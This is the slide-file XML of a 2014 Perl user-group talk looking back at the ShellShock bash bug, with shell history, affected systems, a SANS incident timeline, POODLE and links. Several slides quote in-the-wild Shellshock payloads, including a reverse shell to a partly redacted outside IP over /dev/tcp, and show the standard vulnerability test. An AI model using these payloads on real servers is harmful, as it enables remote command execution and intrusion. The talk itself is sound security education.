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FB482EC-23E8-4A06-B285-7DB216933EF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ShellShock retrospective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Bill Ricker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>2014-10-14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Boston.pm</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>CC-BY-SA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39680" y="2651760"/>
            <a:ext cx="2526480" cy="233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Horrors patching an older system manually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https://github.com/sillymoose/bashfix/issues/1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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jkeenan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Reverse DNS (Mac only)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(bonus slide added later)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Reverse DNS bash exploit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"At this point of time the stock resolvers (in combination with the libc library) of OSX 10.9 (all versions) and 10.10/R2 are the only known standard installations that pass the bash exploit string back and up to getnameinfo()."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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The Apple resolver is the only one that passes special characters through without escapes, and that enables the syntax required for the exploit. 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Full Disclosure: CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash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vulnerability (CVE-2014-6271 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http://seclists.org/fulldisclosure/2014/Oct/53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Another ancient lurking horror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Georgia"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Problems with data serializers was a major change to Mastering Perl. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Storable issue with malformed inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>   was known for a long time but nobody much cared about it. Now it’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>Data::Dumper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>'s turn.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>  “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t>CVE-2014-4330</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Georgia"/>
              </a:rPr>
              <a:t> uncovered a problem for very deeply nested data structures. Data::Dumper can’t handle it past a certain point and perl gives up.”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.masteringperl.org/2014/10/the-datadumper-stack-smash-fixed/?utm_source=twitterfeed&amp;utm_medium=twitter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> 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GIGO, No problem? No.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It's remotely executable.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Our XML parsing uses Data::Dumper.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XML can make self-referential datastructure.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Which is what chokes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Data::Dumper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>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Xml RPC webpage interface (pre-JSON JAX)  expose 'send me XML' Perl.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See also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://osdir.com/ml/general/2014-09/msg58174.html</a:t>
            </a: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POODLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(bonus slide added later)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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Padding Oracle on Downgraded Legacy Encryption”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Yet another side-jack exploit – HTTPS in Starbucks not safe if SSLv3 downgrade allowed !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Another "Padding Oracle" attack on Block-mode ciphers on the deprecated SSL3 (replaced by TLS1.1)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http://www.wired.com/2014/10/poodle-explained/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Disable ssl3 in browser, servers. Now.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Many Eyes make bugs shallow??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Many eyes only works when we LOOK.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Folks have found  MULTIPLE problems with BASH once fuzzing with invalid input was CONSIDERED.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LOOK.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Look especially at what bad input program could get, and error handling/recovery of that. Any input. Test suite is probably &lt; 50% for that,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even if it has “full test cover”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latin typeface="Arial"/>
              </a:rPr>
              <a:t> as the missing  tests would test missing code !!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Links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5025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SANS Internet Storm Center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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>https://isc.sans.edu/diaryarchive.html?year=2014&amp;month=9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="3200">
                <a:latin typeface="Accanthis ADF Std No2"/>
              </a:rPr>
              <a:t>also daily podcast M-F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Security Now! (TwiT.tv/sn) (</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="3200">
                <a:latin typeface="Accanthis ADF Std No2"/>
              </a:rPr>
              <a:t>weekly podcast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>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“</a:t>
            </a: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Shocked by the Shell”, SN#475, show notes: </a:t>
            </a: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https://www.grc.com/sn/SN-475-Notes.pdf</a:t>
            </a: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Update on Yahoo! worm </a:t>
            </a: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https://www.grc.com/sn/SN-476-Notes.pdf</a:t>
            </a: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  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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5 Articles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://javarevisited.blogspot.sg/2014/10/5-articles-to-learn-about-shellshock.html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OpenVPN vuln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://threatpost.com/openvpn-vulnerable-to-shellshock-bash-vulnerability/108616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ShellShock &amp;Perl </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://perltricks.com/article/115/2014/9/26/Shellshock-and-Perl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avoid the shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.perlmonks.org/?node_id=1101954</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10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Ars recap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://arstechnica.com/security/2014/09/shellshock-fixes-beget-another-round-of-patches-as-attacks-mount/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How to patch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://hackaholic.info/shellshock-and-how-to-patch-it/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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7 Q&amp;A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.cygnet-infotech.com/shellshock-bash-software-bug-top-7-questions-answered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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Xploits  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.exploit-db.com/exploits/34766/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>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https://github.com/mubix/shellshocker-pocs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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Admin mag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.admin-magazine.com/News/Bash-Shellshock-Bug-Causes-Attacks-Around-the-World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>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Symantec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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Tom notes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>https://www.mail-archive.com/busybox@busybox.net/msg08680.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Busybox may not be as POSIX compliant as Dash.” (Did anyone claim it was?)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92320"/>
            <a:ext cx="9071640" cy="128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BASH, anyway? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="4400">
                <a:latin typeface="Accanthis ADF Std No2"/>
              </a:rPr>
              <a:t>A shell, a pun, a design bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>.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Bourne shell was 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" baseline="101000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> generation BELL Labs Unix '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>' in V7 Unix;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after Thompson and Mashey/PWB editions of 'sh'. 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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>' is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" u="sng">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> functionality for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>fork()/system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> to work. </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="3200">
                <a:latin typeface="Accanthis ADF Std No2"/>
              </a:rPr>
              <a:t>Yes, libc calls sh.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ASH &amp; DASH [Debian] Almquist shell – conservative extended SH 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latin typeface="Arial"/>
              </a:rPr>
              <a:t>aliased as sh in many *BSD &amp; Deb/untu(2009+).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Ksh, ksh88,ksh93, phksh: Korn shell. 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" baseline="101000">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> Gen Bell shell.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latin typeface="Arial"/>
              </a:rPr>
              <a:t> adopted by IBM AIX (aliased as sh)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Bourne-Again Shell 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latin typeface="Arial"/>
              </a:rPr>
              <a:t>Gnu's pun name for their massive, interactive extension of Bourne's shell.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latin typeface="Arial"/>
              </a:rPr>
              <a:t>Aliased as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>/bin/sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> on many Gnu/Linux systems.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Zsh – further interactive extension of bash.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Csh – alternative, more-C-like &amp; interactive shell, popular as interactive shell on *BSD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Tcsh, enhanced interactive csh with Tenex features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[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://en.wikipedia.org/wiki/Unix_shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  ]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ShellShock : Another Horrid Pun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Baskervald ADF Std"/>
              </a:rPr>
              <a:t>On this 100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" baseline="101000">
                <a:latin typeface="Baskervald ADF Std"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Baskervald ADF Std"/>
              </a:rPr>
              <a:t> anniversary of WW1, Shellshock is nothing to laugh at.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Baskervald ADF Std"/>
              </a:rPr>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>shellshock images</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Baskervald ADF Std"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans MS"/>
              </a:rPr>
              <a:t>Trigger warnings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>!!]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Pick your visual pun logo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74720" y="3840480"/>
            <a:ext cx="6286320" cy="35334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4846320"/>
            <a:ext cx="2526480" cy="233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were they thinking?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ourier 10 Pitch"/>
              </a:rPr>
              <a:t>env func='() {defin;};'  scriptusingfunc.bash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Bash was precursor to Java dependency-injection !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Had down side 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ourier 10 Pitch"/>
              </a:rPr>
              <a:t>env ls='() {exploit here;};'  rootscript.bash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This another reason why SETUID is ignored on scripts!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Bad idea anyway?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They're “Considering” naming requirements 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And had Remote injection – to avoid supporting separate codebase, let bash be original sh too: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ourier 10 Pitch"/>
              </a:rPr>
              <a:t>ln [-s] /bin/bash /bin/sh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ourier 10 Pitch"/>
              </a:rPr>
              <a:t>env user_agent='() { :;}; echo </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2000">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>put exploit here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>;'  some.cgi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>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Bash like Tcsh, Zsh, is an interactive shell,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too heavyweight for #! or /bin/sh useage!!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Exploit(able|ed) in the wild ?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91440" y="1280160"/>
            <a:ext cx="6035040" cy="6217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Yes and yes.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Courier 10 Pitch"/>
              </a:rPr>
              <a:t>() { :;}; /bin/ping -c 1 198.x.x.x;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Courier 10 Pitch"/>
              </a:rPr>
              <a:t>() { :;}; echo shellshock-scan &gt; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>/example.com/1234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Courier 10 Pitch"/>
              </a:rPr>
              <a:t>() { ignored;};/bin/bash -i &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>/104.x.x.x/80 0&gt;&amp;1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ErrataSec ran scan.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http://blog.erratasec.com/2014/09/bash-shellshock-bug-is-wormable.html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http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html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At least he signed his scan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>so you knew it was a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>grayhat scan …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Disturbing # sites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latin typeface="Arial"/>
              </a:rPr>
              <a:t>vulnerable on 80:/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Would be more looking for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>/cgi-bin/* ! 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97680" y="2864160"/>
            <a:ext cx="5722920" cy="353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How's it work? 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097280"/>
            <a:ext cx="8686800" cy="655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In the Wild 2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Berenis ADF No2 Style"/>
              </a:rPr>
              <a:t>Actual test (server name removed to protect the guilty)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial;sans-serif"/>
              </a:rPr>
              <a:t>$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial;sans-serif"/>
              </a:rPr>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial;sans-serif"/>
              </a:rPr>
              <a:t>this is a test</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:latin typeface="arial;sans-serif"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$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Yahoo Sports API servers were not susceptibe to ShellShock, but were otherwise subverted to look for shellshock vulns, via command injection bug in weblog debug script. </a:t>
            </a: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*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>More </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>https://isc.sans.edu/diary.html?storyid=18725</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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SANS ISC timeline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56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Archive Diary List  2014-9-01 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>https://isc.sans.edu/diaryarchive.html?year=2014&amp;month=9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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Date</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Author</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Title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2014-09-30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Russ McRee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ISC threat level returned to green - ShellShock message traffic subsiding, recommend focus on patching and monitoring (oneliner) (0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2014-09-30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Russ McRee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DerbyCon highlights (2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2014-09-30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Johannes Ullrich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ISC StormCast for Tuesday, September 30th 2014 http://isc.sans.edu/podcastdetail.html?id=4169 (oneliner) (0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2014-09-29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Johannes Ullrich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Apple Released Update to Fix Shellshock Vulnerability http://support.apple.com/kb/DL1769 (oneliner) (0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2014-09-29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Johannes Ullrich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Shellshock: Updated </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Webcast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> (Now 6 bash related CVEs!) (1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2014-09-29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Johannes Ullrich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Shellshock: A Collection of Exploits seen in the wild (11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2014-09-29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Johannes Ullrich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Shellshock: We are not done yet CVE-2014-6277, CVE-2014-6278 (0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2014-09-29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Johannes Ullrich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Shellshock: Vulnerable Systems you may have missed and how to move forward (2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2014-09-29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Johannes Ullrich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ISC StormCast for Monday, September 29th 2014 http://isc.sans.edu/podcastdetail.html?id=4167 (oneliner) (0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2014-09-27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Guy Bruneau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What has Bash and Heartbleed Taught Us? (1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2014-09-26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Richard Porter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Why We Have Moved to InfoCon:Yellow (6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2014-09-26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Richard Porter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Semiannual Cisco IOS Software Security Advisory Bundled Publication http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep14.html (oneliner) (0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2014-09-25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Johannes Ullrich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ISC StormCast for Friday, September 26th 2014 http://isc.sans.edu/podcastdetail.html?id=4165 (oneliner) (0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2014-09-25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Johannes Ullrich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Webcast </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Briefing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>: Bash Code Injection Vulnerability (7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2014-09-25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Johannes Ullrich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Update on CVE-2014-6271: Vulnerability in bash (shellshock) (28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2014-09-25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Johannes Ullrich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ISC StormCast for Thursday, September 25th 2014 http://isc.sans.edu/podcastdetail.html?id=4163 (oneliner) (0 Comments)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2014-09-24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Pedro Bueno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Attention *NIX admins, time to patch! (7 Comments)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(not) vulnerable?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44337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 u="sng">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Vulnerable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Initially assumed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>only shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> bin-cgi's, rare,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> but all embeddeds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>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600">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Any bash w/ rogue ENV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Fork/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2800">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t> sh=&gt;bash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RH, Mac, older Debian, ...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cgi-bin forks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>system()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*sh, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>, exe, …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OpenVPN server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DHCP client #! bash even on Debuntu !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CPanel, CUPS, … admin tools.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SSH (restriction broken)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latin typeface="Arial"/>
              </a:rPr>
              <a:t>Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> `Backtick` &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier 10 Pitch"/>
              </a:rPr>
              <a:t>system()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to </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> language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Uses /bin/sh to parse</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextShape 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5258880" y="1742400"/>
            <a:ext cx="44337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 u="sng">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Not Vulnerable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Recent Debian/Ubuntu cgi safe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ourier 10 Pitch"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:latin typeface="Courier 10 Pitch"/>
